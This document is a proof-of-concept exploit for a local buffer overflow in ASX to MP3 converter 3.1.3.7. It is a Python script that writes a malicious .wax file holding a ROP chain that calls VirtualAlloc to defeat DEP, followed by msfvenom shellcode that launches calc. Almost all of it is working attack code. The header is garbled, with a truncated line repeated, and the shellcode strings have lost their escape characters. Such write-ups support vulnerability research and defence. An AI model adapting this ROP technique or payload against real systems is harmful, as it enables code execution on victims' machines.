# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converte # Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-08-25
# Vulnerable Software: ASX to MP3 converter
# Version: 3.1.3.7.2010.11.05
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Proof of Concept :

# 1.- Run python code: asx_to_mp3_rop_exploit.py
# 2.- Works on DEP enabled for ASX2MP3Converter.exe
# 3.- Open "ASX2MP3Converter.exe"
# 4.- Click on "Load" Button
# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
# 6.- Click on "Open".
# 7.- Calc.exe runs.


#################################################################################################################################################

#Python "asx_to_mp3_rop_exploit.py" Code:

import struct
file = 'asx_to_mp3_rop_exploit.wax'


payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC"


## msfvenom -a x86 -p windows/exec cmd=calc -b "x00x0ax09" -f python

buf = ""
buf += "xbex4bxe7x94x8cxdbxcdxd9x74x24xf4x5ax33"
buf += "xc9xb1x30x31x72x13x03x72x13x83xeaxb7x05"
buf += "x61x70xafx48x8ax89x2fx2dx02x6cx1ex6dx70"
buf += "xe4x30x5dxf2xa8xbcx16x56x59x37x5ax7fx6e"
buf += "xf0xd1x59x41x01x49x99xc0x81x90xcex22xb8"
buf += "x5ax03x22xfdx87xeex76x56xc3x5dx67xd3x99"
buf += "x5dx0cxafx0cxe6xf1x67x2exc7xa7xfcx69xc7"
buf += "x46xd1x01x4ex51x36x2fx18xeax8cxdbx9bx3a"
buf += "xddx24x37x03xd2xd6x49x43xd4x08x3cxbdx27"
buf += "xb4x47x7ax5ax62xcdx99xfcxe1x75x46xfdx26"
buf += "xe3x0dxf1x83x67x49x15x15xabxe1x21x9ex4a"
buf += "x26xa0xe4x68xe2xe9xbfx11xb3x57x11x2dxa3"
buf += "x38xcex8bxafxd4x1bxa6xedxb2xdax34x88xf0"
buf += "xddx46x93xa4xb5x77x18x2bxc1x87xcbx08x3d"
buf += "xc2x56x38xd6x8bx02x79xbbx2bxf9xbdxc2xaf"
buf += "x08x3dx31xafx78x38x7dx77x90x30xeex12x96"
buf += "xe7x0fx37xf5x66x9cxdbxfa"



## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11112112)
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEEEEE)
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)


## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc()
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)


## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN



## Save the address of esp in EBP
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN



##Save memory protection code (0x40) in ECX
payload += struct.pack('<L',0x1002e16c) # POP ECX # RETN
payload += struct.pack('<L',0xffffffff)
payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN


## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
payload += struct.pack('<L', 0x10010C8A) # RETN




## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN



payload += "x90" * 4
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
payload += "x90" * 20
payload += buf



f = open(file,'w')
f.write(payload)
f.close()